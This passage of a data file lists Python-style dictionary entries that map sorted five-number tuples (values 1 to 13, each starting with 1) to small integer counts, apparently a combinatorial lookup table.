(1, 1, 3, 10, 11): 4,
(1, 1, 3, 10, 12): 8,
(1, 1, 3, 10, 13): 5,
(1, 1, 3, 11, 11): 3,
(1, 1, 3, 11, 12): 3,
(1, 1, 3, 11, 13): 4,
(1, 1, 3, 12, 12): 4,
(1, 1, 3, 12, 13): 4,
(1, 1, 3, 13, 13): 3,
(1, 1, 4, 4, 5): 3,
(1, 1, 4, 4, 6): 2,
(1, 1, 4, 4, 7): 4,
(1, 1, 4, 4, 8): 1,
(1, 1, 4, 4, 9): 3,
(1, 1, 4, 4, 10): 6,
(1, 1, 4, 4, 11): 5,
(1, 1, 4, 4, 12): 2,
(1, 1, 4, 4, 13): 4,
(1, 1, 4, 5, 5): 2,
(1, 1, 4, 5, 6): 3,
(1, 1, 4, 5, 7): 2,
(1, 1, 4, 5, 8): 8,
(1, 1, 4, 5, 9): 6,
(1, 1, 4, 5, 10): 8,
(1, 1, 4, 5, 11): 5,
(1, 1, 4, 5, 12): 8,
(1, 1, 4, 5, 13): 3,
(1, 1, 4, 6, 6): 4,
(1, 1, 4, 6, 7): 6,
(1, 1, 4, 6, 8): 5,
(1, 1, 4, 6, 9): 9,
(1, 1, 4, 6, 10): 7,
(1, 1, 4, 6, 11): 7,
(1, 1, 4, 6, 12): 5,
(1, 1, 4, 6, 13): 9,
(1, 1, 4, 7, 7): 4,
(1, 1, 4, 7, 8): 8,
(1, 1, 4, 7, 9): 4,
(1, 1, 4, 7, 10): 6,
(1, 1, 4, 7, 11): 4,
(1, 1, 4, 7, 12): 13,
(1, 1, 4, 7, 13): 3,
(1, 1, 4, 8, 8): 1,
(1, 1, 4, 8, 9): 6,
(1, 1, 4, 8, 10): 5,
(1, 1, 4, 8, 11): 9,
(1, 1, 4, 8, 12): 3,
(1, 1, 4, 8, 13): 8,
(1, 1, 4, 9, 9): 1,
(1, 1, 4, 9, 10): 5,
(1, 1, 4, 9, 11): 3,
(1, 1, 4, 9, 12): 8,
(1, 1, 4, 9, 13): 2,
(1, 1, 4, 10, 10): 2,
(1, 1, 4, 10, 11): 6,
(1, 1, 4, 10, 12): 4,
(1, 1, 4, 10, 13): 5,
(1, 1, 4, 11, 11): 1,
(1, 1, 4, 11, 12): 7,
(1, 1, 4, 11, 13): 3,
(1, 1, 4, 12, 12): 2,
(1, 1, 4, 12, 13): 6,
(1, 1, 4, 13, 13): 2,
(1, 1, 5, 5, 6): 2,
(1, 1, 5, 5, 7): 3,
(1, 1, 5, 5, 8): 4,
(1, 1, 5, 5, 9): 3,
(1, 1, 5, 5, 10): 1,
(1, 1, 5, 5, 11): 4,
(1, 1, 5, 5, 12): 3,
(1, 1, 5, 5, 13): 3,
(1, 1, 5, 6, 6): 5,
(1, 1, 5, 6, 7): 12,
(1, 1, 5, 6, 8): 7,
(1, 1, 5, 6, 9): 7,
(1, 1, 5, 6, 10): 6,
(1, 1, 5, 6, 11): 4,
(1, 1, 5, 6, 12): 10,
(1, 1, 5, 6, 13): 5,
(1, 1, 5, 7, 7): 6,
(1, 1, 5, 7, 8): 6,
(1, 1, 5, 7, 9): 6,
(1, 1, 5, 7, 10): 3,
(1, 1, 5, 7, 11): 5,
(1, 1, 5, 7, 12): 5,
(1, 1, 5, 7, 13): 8,
(1, 1, 5, 8, 8): 4,
(1, 1, 5, 8, 9): 2,
(1, 1, 5, 8, 10): 4,
(1, 1, 5, 8, 11): 3,
(1, 1, 5, 8, 12): 8,
(1, 1, 5, 8, 13): 1,
(1, 1, 5, 9, 9): 1,
(1, 1, 5, 9, 10): 3,
(1, 1, 5, 9, 11): 5,
(1, 1, 5, 9, 12): 2,
(1, 1, 5, 9, 13): 4,
(1, 1, 5, 10, 10): 1,
(1, 1, 5, 10, 11): 2,
(1, 1, 5, 10, 12): 6,
(1, 1, 5, 10, 13): 3,
(1, 1, 5, 11, 11): 1,
(1, 1, 5, 11, 12): 1,
(1, 1, 5, 11, 13): 3,
(1, 1, 5, 12, 12): 3,
(1, 1, 5, 12, 13): 3,
(1, 1, 5, 13, 13): 3,
(1, 1, 6, 6, 6): 1,
(1, 1, 6, 6, 7): 8,
(1, 1, 6, 6, 8): 5,
(1, 1, 6, 6, 9): 3,
(1, 1, 6, 6, 10): 2,
(1, 1, 6, 6, 11): 3,
(1, 1, 6, 6, 12): 7,
(1, 1, 6, 6, 13): 4,
(1, 1, 6, 7, 7): 8,
(1, 1, 6, 7, 8): 13,
(1, 1, 6, 7, 9): 6,
(1, 1, 6, 7, 10): 3,
(1, 1, 6, 7, 11): 4,
(1, 1, 6, 7, 12): 9,
(1, 1, 6, 7, 13): 8,
(1, 1, 6, 8, 8): 3,
(1, 1, 6, 8, 9): 3,
(1, 1, 6, 8, 10): 3,
(1, 1, 6, 8, 11): 6,
(1, 1, 6, 8, 12): 4,
(1, 1, 6, 8, 13): 8,
(1, 1, 6, 9, 9): 1,
(1, 1, 6, 9, 10): 4,
(1, 1, 6, 9, 11): 3,
(1, 1, 6, 9, 12): 6,
(1, 1, 6, 9, 13): 3,
(1, 1, 6, 10, 10): 2,
(1, 1, 6, 10, 11): 2,
(1, 1, 6, 10, 12): 4,
(1, 1, 6, 10, 13): 6,
(1, 1, 6, 11, 12): 3,
(1, 1, 6, 11, 13): 2,
(1, 1, 6, 12, 12): 3,
(1, 1, 6, 12, 13): 5,
(1, 1, 7, 7, 7): 2,
(1, 1, 7, 7, 8): 5,
(1, 1, 7, 7, 9): 2,
(1, 1, 7, 7, 10): 2,
(1, 1, 7, 7, 11): 2,
(1, 1, 7, 7, 12): 2,
(1, 1, 7, 7, 13): 4,
(1, 1, 7, 8, 8): 2,
(1, 1, 7, 8, 10): 4,
(1, 1, 7, 8, 11): 1,
(1, 1, 7, 8, 12): 7,
(1, 1, 7, 8, 13): 3,
(1, 1, 7, 9, 10): 1,
(1, 1, 7, 9, 11): 2,
(1, 1, 7, 9, 12): 5,
(1, 1, 7, 9, 13): 7,
(1, 1, 7, 10, 11): 3,
(1, 1, 7, 10, 12): 4,
(1, 1, 7, 10, 13): 3,
(1, 1, 7, 11, 11): 1,
(1, 1, 7, 11, 12): 2,
(1, 1, 7, 11, 13): 3,
(1, 1, 7, 12, 12): 2,
(1, 1, 7, 12, 13): 1,
(1, 1, 8, 8, 9): 1,
(1, 1, 8, 8, 10): 2,
(1, 1, 8, 8, 11): 1,
(1, 1, 8, 8, 13): 4,
(1, 1, 8, 9, 12): 4,
(1, 1, 8, 10, 10): 1,
(1, 1, 8, 10, 12): 3,
(1, 1, 8, 10, 13): 2,
(1, 1, 8, 11, 12): 3,
(1, 1, 8, 11, 13): 1,
(1, 1, 8, 12, 12): 2,
(1, 1, 8, 12, 13): 3,
(1, 1, 8, 13, 13): 1,
(1, 1, 9, 9, 12): 1,
(1, 1, 9, 10, 13): 2,
(1, 1, 9, 11, 11): 1,
(1, 1, 9, 11, 12): 1,
(1, 1, 9, 11, 13): 4,
(1, 1, 9, 12, 12): 3,
(1, 1, 9, 12, 13): 2,
(1, 1, 9, 13, 13): 1,
(1, 1, 10, 10, 11): 1,
(1, 1, 10, 10, 12): 1,
(1, 1, 10, 11, 11): 1,
(1, 1, 10, 11, 13): 1,
(1, 1, 10, 12, 13): 4,
(1, 1, 10, 13, 13): 2,
(1, 1, 11, 13, 13): 1,
(1, 2, 2, 2, 5): 3,
(1, 2, 2, 2, 6): 6,
(1, 2, 2, 2, 7): 4,
(1, 2, 2, 2, 8): 5,
(1, 2, 2, 2, 9): 4,
(1, 2, 2, 2, 10): 6,
(1, 2, 2, 2, 11): 4,
(1, 2, 2, 2, 12): 8,
(1, 2, 2, 2, 13): 2,
(1, 2, 2, 3, 3): 1,
(1, 2, 2, 3, 4): 7,
(1, 2, 2, 3, 5): 6,
(1, 2, 2, 3, 6): 9,
(1, 2, 2, 3, 7): 12,
(1, 2, 2, 3, 8): 12,
(1, 2, 2, 3, 9): 13,
(1, 2, 2, 3, 10): 10,
(1, 2, 2, 3, 11): 12,
(1, 2, 2, 3, 12): 13,
(1, 2, 2, 3, 13): 13,
(1, 2, 2, 4, 4): 4,
(1, 2, 2, 4, 5): 7,
(1, 2, 2, 4, 6): 12,
(1, 2, 2, 4, 7): 11,
(1, 2, 2, 4, 8): 10,
(1, 2, 2, 4, 9): 12,
(1, 2, 2, 4, 10): 16,
(1, 2, 2, 4, 11): 11,
(1, 2, 2, 4, 12): 19,
(1, 2, 2, 4, 13): 7,
(1, 2, 2, 5, 5): 4,
(1, 2, 2, 5, 6): 11,
(1, 2, 2, 5, 7): 8,
(1, 2, 2, 5, 8): 11,
(1, 2, 2, 5, 9): 12,
(1, 2, 2, 5, 10): 7,
(1, 2, 2, 5, 11): 9,
(1, 2, 2, 5, 12): 13,
(1, 2, 2, 5, 13): 8,
(1, 2, 2, 6, 6): 6,
(1, 2, 2, 6, 7): 7,
(1, 2, 2, 6, 8): 14,
(1, 2, 2, 6, 9): 9,
(1, 2, 2, 6, 10): 19,
(1, 2, 2, 6, 11): 12,
(1, 2, 2, 6, 12): 17,
(1, 2, 2, 6, 13): 11,
(1, 2, 2, 7, 7): 8,
(1, 2, 2, 7, 8): 9,
(1, 2, 2, 7, 9): 14,
(1, 2, 2, 7, 10): 9,
(1, 2, 2, 7, 11): 10,
(1, 2, 2, 7, 12): 11,
(1, 2, 2, 7, 13): 9,
(1, 2, 2, 8, 8): 6,
(1, 2, 2, 8, 9): 8,
(1, 2, 2, 8, 10): 14,
(1, 2, 2, 8, 11): 9,
(1, 2, 2, 8, 12): 12,
(1, 2, 2, 8, 13): 6,
(1, 2, 2, 9, 9): 5,
(1, 2, 2, 9, 10): 9,
(1, 2, 2, 9, 11): 6,
(1, 2, 2, 9, 12): 7,
(1, 2, 2, 9, 13): 7,
(1, 2, 2, 10, 10): 5,
(1, 2, 2, 10, 11): 4,
(1, 2, 2, 10, 12): 12,
(1, 2, 2, 10, 13): 6,
(1, 2, 2, 11, 11): 5,
(1, 2, 2, 11, 12): 6,
(1, 2, 2, 11, 13): 7,
(1, 2, 2, 12, 12): 6,
(1, 2, 2, 12, 13): 8,
(1, 2, 2, 13, 13): 4,
(1, 2, 3, 3, 3): 4,
(1, 2, 3, 3, 4): 9,
(1, 2, 3, 3, 5): 13,
(1, 2, 3, 3, 6): 11,
(1, 2, 3, 3, 7): 10,
(1, 2, 3, 3, 8): 13,
(1, 2, 3, 3, 9): 19,
(1, 2, 3, 3, 10): 10,
(1, 2, 3, 3, 11): 6,
(1, 2, 3, 3, 12): 19,
(1, 2, 3, 3, 13): 6,
(1, 2, 3, 4, 4): 9,
(1, 2, 3, 4, 5): 14,
(1, 2, 3, 4, 6): 19,
(1, 2, 3, 4, 7): 21,
(1, 2, 3, 4, 8): 22,
(1, 2, 3, 4, 9): 23,
(1, 2, 3, 4, 10): 24,
(1, 2, 3, 4, 11): 26,
(1, 2, 3, 4, 12): 23,
(1, 2, 3, 4, 13): 26,
(1, 2, 3, 5, 5): 9,
(1, 2, 3, 5, 6): 21,
(1, 2, 3, 5, 7): 19,
(1, 2, 3, 5, 8): 18,
(1, 2, 3, 5, 9): 17,
(1, 2, 3, 5, 10): 18,
(1, 2, 3, 5, 11): 18,
(1, 2, 3, 5, 12): 26,
(1, 2, 3, 5, 13): 18,
(1, 2, 3, 6, 6): 15,
(1, 2, 3, 6, 7): 28,
(1, 2, 3, 6, 8): 15,
(1, 2, 3, 6, 9): 26,
(1, 2, 3, 6, 10): 16,
(1, 2, 3, 6, 11): 25,
(1, 2, 3, 6, 12): 35,
(1, 2, 3, 6, 13): 21,
(1, 2, 3, 7, 7): 11,
(1, 2, 3, 7, 8): 21,
(1, 2, 3, 7, 9): 14,
(1, 2, 3, 7, 10): 25,
(1, 2, 3, 7, 11): 16,
(1, 2, 3, 7, 12): 26,
(1, 2, 3, 7, 13): 16,
(1, 2, 3, 8, 8): 7,
(1, 2, 3, 8, 9): 24,
(1, 2, 3, 8, 10): 20,
(1, 2, 3, 8, 11): 18,
(1, 2, 3, 8, 12): 15,
(1, 2, 3, 8, 13): 16,
(1, 2, 3, 9, 9): 14,
(1, 2, 3, 9, 10): 21,
(1, 2, 3, 9, 11): 15,
(1, 2, 3, 9, 12): 23,
(1, 2, 3, 9, 13): 16,
(1, 2, 3, 10, 10): 8,
(1, 2, 3, 10, 11): 14,
(1, 2, 3, 10, 12): 16,
(1, 2, 3, 10, 13): 13,
(1, 2, 3, 11, 11): 8,
(1, 2, 3, 11, 12): 21,
(1, 2, 3, 11, 13): 11,
(1, 2, 3, 12, 12): 15,
(1, 2, 3, 12, 13): 18,
(1, 2, 3, 13, 13): 5,
(1, 2, 4, 4, 4): 4,
(1, 2, 4, 4, 5): 9,
(1, 2, 4, 4, 6): 18,
(1, 2, 4, 4, 7): 9,
(1, 2, 4, 4, 8): 12,
(1, 2, 4, 4, 9): 10,
(1, 2, 4, 4, 10): 12,
(1, 2, 4, 4, 11): 11,
(1, 2, 4, 4, 12): 19,
(1, 2, 4, 4, 13): 9,
(1, 2, 4, 5, 5): 11,
(1, 2, 4, 5, 6): 22,
(1, 2, 4, 5, 7): 24,
(1, 2, 4, 5, 8): 15,
(1, 2, 4, 5, 9): 18,
(1, 2, 4, 5, 10): 20,
(1, 2, 4, 5, 11): 23,
(1, 2, 4, 5, 12): 20,
(1, 2, 4, 5, 13): 21,
(1, 2, 4, 6, 6): 13,
(1, 2, 4, 6, 7): 33,
(1, 2, 4, 6, 8): 25,
(1, 2, 4, 6, 9): 17,
(1, 2, 4, 6, 10): 26,
(1, 2, 4, 6, 11): 16,
(1, 2, 4, 6, 12): 30,
(1, 2, 4, 6, 13): 16,
(1, 2, 4, 7, 7): 14,
(1, 2, 4, 7, 8): 19,
(1, 2, 4, 7, 9): 18,
(1, 2, 4, 7, 10): 13,
(1, 2, 4, 7, 11): 15,
(1, 2, 4, 7, 12): 19,
(1, 2, 4, 7, 13): 22,
(1, 2, 4, 8, 8): 10,
(1, 2, 4, 8, 9): 12,
(1, 2, 4, 8, 10): 22,
(1, 2, 4, 8, 11): 16,
(1, 2, 4, 8, 12): 31,
(1, 2, 4, 8, 13): 10,
(1, 2, 4, 9, 9): 9,
(1, 2, 4, 9, 10): 16,
(1, 2, 4, 9, 11): 14,
(1, 2, 4, 9, 12): 15,
(1, 2, 4, 9, 13): 14,
(1, 2, 4, 10, 10): 8,
(1, 2, 4, 10, 11): 15,
(1, 2, 4, 10, 12): 18,
(1, 2, 4, 10, 13): 9,
(1, 2, 4, 11, 11): 7,
(1, 2, 4, 11, 12): 17,
(1, 2, 4, 11, 13): 11,
(1, 2, 4, 12, 12): 14,
(1, 2, 4, 12, 13): 17,
(1, 2, 4, 13, 13): 5,
(1, 2, 5, 5, 5): 2,
(1, 2, 5, 5, 6): 12,
(1, 2, 5, 5, 7): 6,
(1, 2, 5, 5, 8): 9,
(1, 2, 5, 5, 9): 11,
(1, 2, 5, 5, 10): 9,
(1, 2, 5, 5, 11): 5,
(1, 2, 5, 5, 12): 10,
(1, 2, 5, 5, 13): 6,
(1, 2, 5, 6, 6): 10,
(1, 2, 5, 6, 7): 25,
(1, 2, 5, 6, 8): 23,
(1, 2, 5, 6, 9): 26,
(1, 2, 5, 6, 10): 17,
(1, 2, 5, 6, 11): 14,
(1, 2, 5, 6, 12): 15,
(1, 2, 5, 6, 13): 16,
(1, 2, 5, 7, 7): 9,
(1, 2, 5, 7, 8): 18,
(1, 2, 5, 7, 9): 15,
(1, 2, 5, 7, 10): 18,
(1, 2, 5, 7, 11): 8,
(1, 2, 5, 7, 12): 22,
(1, 2, 5, 7, 13): 11,
(1, 2, 5, 8, 8): 5,
(1, 2, 5, 8, 9): 16,
(1, 2, 5, 8, 10): 9,
(1, 2, 5, 8, 11): 14,
(1, 2, 5, 8, 12): 13,
(1, 2, 5, 8, 13): 18,
(1, 2, 5, 9, 9): 6,
(1, 2, 5, 9, 10): 15,
(1, 2, 5, 9, 11): 11,
(1, 2, 5, 9, 12): 21,
(1, 2, 5, 9, 13): 8,
(1, 2, 5, 10, 10): 7,
(1, 2, 5, 10, 11): 16,
(1, 2, 5, 10, 12): 14,
(1, 2, 5, 10, 13): 11,
(1, 2, 5, 11, 11): 4,
(1, 2, 5, 11, 12): 14,
(1, 2, 5, 11, 13): 6,
(1, 2, 5, 12, 12): 7,
(1, 2, 5, 12, 13): 13,
(1, 2, 5, 13, 13): 5,
(1, 2, 6, 6, 6): 4,
(1, 2, 6, 6, 7): 13,
(1, 2, 6, 6, 8): 7,
(1, 2, 6, 6, 9): 17,
(1, 2, 6, 6, 10): 14,
(1, 2, 6, 6, 11): 9,
(1, 2, 6, 6, 12): 13,
(1, 2, 6, 6, 13): 10,
(1, 2, 6, 7, 7): 15,
(1, 2, 6, 7, 8): 28,
(1, 2, 6, 7, 9): 24,
(1, 2, 6, 7, 10): 16,
(1, 2, 6, 7, 11): 15,
(1, 2, 6, 7, 12): 27,
(1, 2, 6, 7, 13): 18,
(1, 2, 6, 8, 8): 9,
(1, 2, 6, 8, 9): 14,
(1, 2, 6, 8, 10): 22,
(1, 2, 6, 8, 11): 18,
(1, 2, 6, 8, 12): 24,
(1, 2, 6, 8, 13): 11,
(1, 2, 6, 9, 9): 11,
(1, 2, 6, 9, 10): 14,
(1, 2, 6, 9, 11): 18,
(1, 2, 6, 9, 12): 20,
(1, 2, 6, 9, 13): 18,
(1, 2, 6, 10, 10): 9,
(1, 2, 6, 10, 11): 14,
(1, 2, 6, 10, 12): 21,
(1, 2, 6, 10, 13): 12,
(1, 2, 6, 11, 11): 4,
(1, 2, 6, 11, 12): 14,
(1, 2, 6, 11, 13): 12,
(1, 2, 6, 12, 12): 19,
(1, 2, 6, 12, 13): 11,
(1, 2, 6, 13, 13): 5,
(1, 2, 7, 7, 7): 4,
(1, 2, 7, 7, 8): 9,
(1, 2, 7, 7, 9): 9,
(1, 2, 7, 7, 10): 10,
(1, 2, 7, 7, 11): 8,
(1, 2, 7, 7, 12): 12,
(1, 2, 7, 7, 13): 10,
(1, 2, 7, 8, 8): 8,
(1, 2, 7, 8, 9): 11,
(1, 2, 7, 8, 10): 15,
(1, 2, 7, 8, 11): 15,
(1, 2, 7, 8, 12): 15,
(1, 2, 7, 8, 13): 16,
(1, 2, 7, 9, 9): 4,
(1, 2, 7, 9, 10): 17,
(1, 2, 7, 9, 11): 15,
(1, 2, 7, 9, 12): 18,
(1, 2, 7, 9, 13): 6,
(1, 2, 7, 10, 10): 5,
(1, 2, 7, 10, 11): 8,
(1, 2, 7, 10, 12): 15,
(1, 2, 7, 10, 13): 17,
(1, 2, 7, 11, 11): 5,
(1, 2, 7, 11, 12): 17,
(1, 2, 7, 11, 13): 7,
(1, 2, 7, 12, 12): 7,
(1, 2, 7, 12, 13): 14,
(1, 2, 7, 13, 13): 3,
(1, 2, 8, 8, 8): 1,
(1, 2, 8, 8, 9): 3,
(1, 2, 8, 8, 10): 10,
(1, 2, 8, 8, 11): 4,
(1, 2, 8, 8, 12): 9,
(1, 2, 8, 8, 13): 4,
(1, 2, 8, 9, 9): 4,
(1, 2, 8, 9, 10): 7,
(1, 2, 8, 9, 11): 7,
(1, 2, 8, 9, 12): 7,
(1, 2, 8, 9, 13): 13,
(1, 2, 8, 10, 10): 5,
(1, 2, 8, 10, 11): 8,
(1, 2, 8, 10, 12): 19,
(1, 2, 8, 10, 13): 6,
(1, 2, 8, 11, 11): 4,
(1, 2, 8, 11, 12): 13,
(1, 2, 8, 11, 13): 11,
(1, 2, 8, 12, 12): 12,
(1, 2, 8, 12, 13): 8,
(1, 2, 8, 13, 13): 6,
(1, 2, 9, 9, 11): 2,
(1, 2, 9, 9, 12): 7,
(1, 2, 9, 9, 13): 7,
(1, 2, 9, 10, 10): 1,
(1, 2, 9, 10, 11): 5,
(1, 2, 9, 10, 12): 9,
(1, 2, 9, 10, 13): 9,
(1, 2, 9, 11, 11): 5,
(1, 2, 9, 11, 12): 12,
(1, 2, 9, 11, 13): 9,
(1, 2, 9, 12, 12): 9,
(1, 2, 9, 12, 13): 12,
(1, 2, 9, 13, 13): 2,
(1, 2, 10, 10, 10): 2,
(1, 2, 10, 10, 11): 3,
(1, 2, 10, 10, 12): 4,
(1, 2, 10, 10, 13): 5,
(1, 2, 10, 11, 11): 3,
(1, 2, 10, 11, 12): 7,
(1, 2, 10, 11, 13): 9,
(1, 2, 10, 12, 12): 6,
(1, 2, 10, 12, 13): 7,
(1, 2, 10, 13, 13): 6,
(1, 2, 11, 11, 11): 2,
(1, 2, 11, 11, 13): 4,
(1, 2, 11, 12, 12): 1,
(1, 2, 11, 12, 13): 5,
(1, 2, 11, 13, 13): 1,
(1, 2, 12, 12, 13): 1,
(1, 2, 12, 13, 13): 3,
(1, 2, 13, 13, 13): 2,
(1, 3, 3, 3, 3): 1,
(1, 3, 3, 3, 4): 5,
(1, 3, 3, 3, 5): 3,
(1, 3, 3, 3, 6): 5,
(1, 3, 3, 3, 7): 3,
(1, 3, 3, 3, 8): 4,
(1, 3, 3, 3, 9): 6,
(1, 3, 3, 3, 10): 3,
(1, 3, 3, 3, 11): 3,
(1, 3, 3, 3, 12): 5,
(1, 3, 3, 3, 13): 2,
(1, 3, 3, 4, 4): 4,
(1, 3, 3, 4, 5): 7,
(1, 3, 3, 4, 6): 8,
(1, 3, 3, 4, 7): 10,
(1, 3, 3, 4, 8): 8,
(1, 3, 3, 4, 9): 12,
(1, 3, 3, 4, 10): 10,
(1, 3, 3, 4, 11): 7,
(1, 3, 3, 4, 12): 16,
(1, 3, 3, 4, 13): 5,
(1, 3, 3, 5, 5): 4,
(1, 3, 3, 5, 6): 20,
(1, 3, 3, 5, 7): 8,
(1, 3, 3, 5, 8): 8,
(1, 3, 3, 5, 9): 7,
(1, 3, 3, 5, 10): 6,
(1, 3, 3, 5, 11): 10,
(1, 3, 3, 5, 12): 15,
(1, 3, 3, 5, 13): 9,
(1, 3, 3, 6, 6): 10,
(1, 3, 3, 6, 7): 19,
(1, 3, 3, 6, 8): 9,
(1, 3, 3, 6, 9): 13,
(1, 3, 3, 6, 10): 11,
(1, 3, 3, 6, 11): 12,
(1, 3, 3, 6, 12): 20,
(1, 3, 3, 6, 13): 16,
(1, 3, 3, 7, 7): 5,
(1, 3, 3, 7, 8): 12,
(1, 3, 3, 7, 9): 9,
(1, 3, 3, 7, 10): 4,
(1, 3, 3, 7, 11): 8,
(1, 3, 3, 7, 12): 13,
(1, 3, 3, 7, 13): 9,
(1, 3, 3, 8, 8): 5,
(1, 3, 3, 8, 9): 10,
(1, 3, 3, 8, 10): 9,
(1, 3, 3, 8, 11): 4,
(1, 3, 3, 8, 12): 8,
(1, 3, 3, 8, 13): 7,
(1, 3, 3, 9, 9): 8,
(1, 3, 3, 9, 10): 8,
(1, 3, 3, 9, 11): 5,
(1, 3, 3, 9, 12): 12,
(1, 3, 3, 9, 13): 10,
(1, 3, 3, 10, 10): 3,
(1, 3, 3, 10, 11): 5,
(1, 3, 3, 10, 12): 8,
(1, 3, 3, 10, 13): 7,
(1, 3, 3, 11, 11): 2,
(1, 3, 3, 11, 12): 7,
(1, 3, 3, 11, 13): 5,
(1, 3, 3, 12, 12): 5,
(1, 3, 3, 12, 13): 12,
(1, 3, 3, 13, 13): 2,
(1, 3, 4, 4, 5): 6,
(1, 3, 4, 4, 6): 10,
(1, 3, 4, 4, 7): 9,
(1, 3, 4, 4, 9): 7,
(1, 3, 4, 4, 10): 12,
(1, 3, 4, 4, 11): 8,
(1, 3, 4, 4, 12): 4,
(1, 3, 4, 4, 13): 7,
(1, 3, 4, 5, 5): 10,
(1, 3, 4, 5, 6): 24,
(1, 3, 4, 5, 7): 18,
(1, 3, 4, 5, 8): 15,
(1, 3, 4, 5, 9): 14,
(1, 3, 4, 5, 10): 16,
(1, 3, 4, 5, 11): 16,
(1, 3, 4, 5, 12): 19,
(1, 3, 4, 5, 13): 9,
(1, 3, 4, 6, 6): 17,
(1, 3, 4, 6, 7): 25,
(1, 3, 4, 6, 8): 24,
(1, 3, 4, 6, 9): 27,
(1, 3, 4, 6, 10): 17,
(1, 3, 4, 6, 11): 21,
(1, 3, 4, 6, 12): 28,
(1, 3, 4, 6, 13): 21,
(1, 3, 4, 7, 7): 13,
(1, 3, 4, 7, 8): 20,
(1, 3, 4, 7, 9): 14,
(1, 3, 4, 7, 10): 18,
(1, 3, 4, 7, 11): 8,
(1, 3, 4, 7, 12): 21,
(1, 3, 4, 7, 13): 9,
(1, 3, 4, 8, 8): 4,
(1, 3, 4, 8, 9): 13,
(1, 3, 4, 8, 10): 17,
(1, 3, 4, 8, 11): 18,
(1, 3, 4, 8, 12): 8,
(1, 3, 4, 8, 13): 19,
(1, 3, 4, 9, 9): 8,
(1, 3, 4, 9, 10): 19,
(1, 3, 4, 9, 11): 10,
(1, 3, 4, 9, 12): 17,
(1, 3, 4, 9, 13): 13,
(1, 3, 4, 10, 10): 6,
(1, 3, 4, 10, 11): 12,
(1, 3, 4, 10, 12): 19,
(1, 3, 4, 10, 13): 12,
(1, 3, 4, 11, 11): 5,
(1, 3, 4, 11, 12): 10,
(1, 3, 4, 11, 13): 11,
(1, 3, 4, 12, 12): 6,
(1, 3, 4, 12, 13): 11,
(1, 3, 4, 13, 13): 8,
(1, 3, 5, 5, 5): 4,
(1, 3, 5, 5, 6): 9,
(1, 3, 5, 5, 7): 7,
(1, 3, 5, 5, 8): 8,
(1, 3, 5, 5, 9): 7,
(1, 3, 5, 5, 10): 7,
(1, 3, 5, 5, 11): 8,
(1, 3, 5, 5, 12): 5,
(1, 3, 5, 5, 13): 6,
(1, 3, 5, 6, 6): 7,
(1, 3, 5, 6, 7): 15,
(1, 3, 5, 6, 8): 15,
(1, 3, 5, 6, 9): 33,
(1, 3, 5, 6, 10): 24,
(1, 3, 5, 6, 11): 10,
(1, 3, 5, 6, 12): 17,
(1, 3, 5, 6, 13): 9,
(1, 3, 5, 7, 7): 8,
(1, 3, 5, 7, 8): 14,
(1, 3, 5, 7, 9): 19,
(1, 3, 5, 7, 10): 15,
(1, 3, 5, 7, 11): 11,
(1, 3, 5, 7, 12): 11,
(1, 3, 5, 7, 13): 13,
(1, 3, 5, 8, 8): 6,
(1, 3, 5, 8, 9): 12,
(1, 3, 5, 8, 10): 11,
(1, 3, 5, 8, 11): 6,
(1, 3, 5, 8, 12): 18,
(1, 3, 5, 8, 13): 11,
(1, 3, 5, 9, 9): 7,
(1, 3, 5, 9, 10): 14,
(1, 3, 5, 9, 11): 14,
(1, 3, 5, 9, 12): 21,
(1, 3, 5, 9, 13): 12,
(1, 3, 5, 10, 10): 10,
(1, 3, 5, 10, 11): 15,
(1, 3, 5, 10, 12): 21,
(1, 3, 5, 10, 13): 10,
(1, 3, 5, 11, 11): 7,
(1, 3, 5, 11, 12): 9,
(1, 3, 5, 11, 13): 6,
(1, 3, 5, 12, 12): 10,
(1, 3, 5, 12, 13): 8,
(1, 3, 5, 13, 13): 5,
(1, 3, 6, 6, 6): 3,
(1, 3, 6, 6, 7): 7,
(1, 3, 6, 6, 8): 13,
(1, 3, 6, 6, 9): 13,
(1, 3, 6, 6, 10): 10,
(1, 3, 6, 6, 11): 7,
(1, 3, 6, 6, 12): 17,
(1, 3, 6, 6, 13): 4,
(1, 3, 6, 7, 7): 6,
(1, 3, 6, 7, 8): 13,
(1, 3, 6, 7, 9): 29,
(1, 3, 6, 7, 10): 22,
(1, 3, 6, 7, 11): 17,
(1, 3, 6, 7, 12): 18,
(1, 3, 6, 7, 13): 9,
(1, 3, 6, 8, 8): 8,
(1, 3, 6, 8, 9): 13,
(1, 3, 6, 8, 10): 15,
(1, 3, 6, 8, 11): 16,
(1, 3, 6, 8, 12): 18,
(1, 3, 6, 8, 13): 16,
(1, 3, 6, 9, 9): 16,
(1, 3, 6, 9, 10): 15,
(1, 3, 6, 9, 11): 19,
(1, 3, 6, 9, 12): 29,
(1, 3, 6, 9, 13): 13,
(1, 3, 6, 10, 10): 7,
(1, 3, 6, 10, 11): 16,
(1, 3, 6, 10, 12): 23,
(1, 3, 6, 10, 13): 14,
(1, 3, 6, 11, 11): 4,
(1, 3, 6, 11, 12): 25,
(1, 3, 6, 11, 13): 10,
(1, 3, 6, 12, 12): 17,
(1, 3, 6, 12, 13): 20,
(1, 3, 6, 13, 13): 1,
(1, 3, 7, 7, 7): 5,
(1, 3, 7, 7, 8): 9,
(1, 3, 7, 7, 9): 10,
(1, 3, 7, 7, 10): 10,
(1, 3, 7, 7, 11): 8,
(1, 3, 7, 7, 12): 11,
(1, 3, 7, 7, 13): 5,
(1, 3, 7, 8, 8): 7,
(1, 3, 7, 8, 9): 17,
(1, 3, 7, 8, 10): 19,
(1, 3, 7, 8, 11): 10,
(1, 3, 7, 8, 12): 14,
(1, 3, 7, 8, 13): 5,
(1, 3, 7, 9, 9): 9,
(1, 3, 7, 9, 10): 16,
(1, 3, 7, 9, 11): 12,
(1, 3, 7, 9, 12): 16,
(1, 3, 7, 9, 13): 12,
(1, 3, 7, 10, 10): 5,
(1, 3, 7, 10, 11): 10,
(1, 3, 7, 10, 12): 19,
(1, 3, 7, 10, 13): 9,
(1, 3, 7, 11, 11): 6,
(1, 3, 7, 11, 12): 9,
(1, 3, 7, 11, 13): 14,
(1, 3, 7, 12, 12): 14,
(1, 3, 7, 12, 13): 13,
(1, 3, 7, 13, 13): 4,
(1, 3, 8, 8, 9): 6,
(1, 3, 8, 8, 10): 9,
(1, 3, 8, 8, 11): 6,
(1, 3, 8, 8, 12): 1,
(1, 3, 8, 8, 13): 6,
(1, 3, 8, 9, 9): 8,
(1, 3, 8, 9, 10): 10,
(1, 3, 8, 9, 11): 5,
(1, 3, 8, 9, 12): 15,
(1, 3, 8, 9, 13): 9,
(1, 3, 8, 10, 10): 5,
